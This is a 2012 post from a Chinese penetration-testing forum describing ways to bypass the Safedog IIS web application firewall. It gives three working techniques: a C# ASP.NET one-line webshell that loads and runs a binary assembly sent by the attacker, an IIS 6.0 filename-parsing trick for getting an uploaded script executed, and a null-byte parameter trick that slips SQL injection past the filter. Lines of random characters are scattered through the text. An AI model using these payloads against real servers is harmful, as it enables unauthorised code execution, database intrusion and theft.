中国网络渗透测试联盟
标题:
突破安全狗防注入及上传的一些思路
[打印本页]
作者:
admin
时间:
2012-10-31 08:25
标题:
突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。
/ m1 l0 B" G d% J
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
X( p0 V, {7 T
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
; y# n3 P( ?0 B3 L8 `
) j5 x1 e# p1 m- q
2、IIS6.0解析漏洞遇到安全狗。
) S4 H, |7 ~- _: t$ t1 k3 ~- r
文件名为
8 y3 g2 o d2 l+ p
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
8 R- X) T/ z5 p5 p
( y: d0 E* G7 c1 @2 r
这样的会被IIS安全狗果断屏蔽。
% S; _. m* g& N
改成如下名称,IIS6一样会解析:
3 {! B2 C& J+ J
www.xxxxx.com/;1.asp;1.jpg
: y* r# l6 `" g3 ` h8 l+ O) q r
( G0 _% k8 T1 x1 ]7 V! l
3、安全狗的注入绕过。
0 c9 f9 _% s( l' F/ `! b
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
) k$ M* Y+ B0 N& O
但如果:
+ v6 l9 M# L1 a
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
; T$ w; U4 D) @' B8 B3 C% N: R
就可以成功绕过了。
" L0 _$ X4 v& `/ ~ I% R) I
9 Q7 t/ U: z3 S
8 n' K' D5 W; L* M( I( z# \7 z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2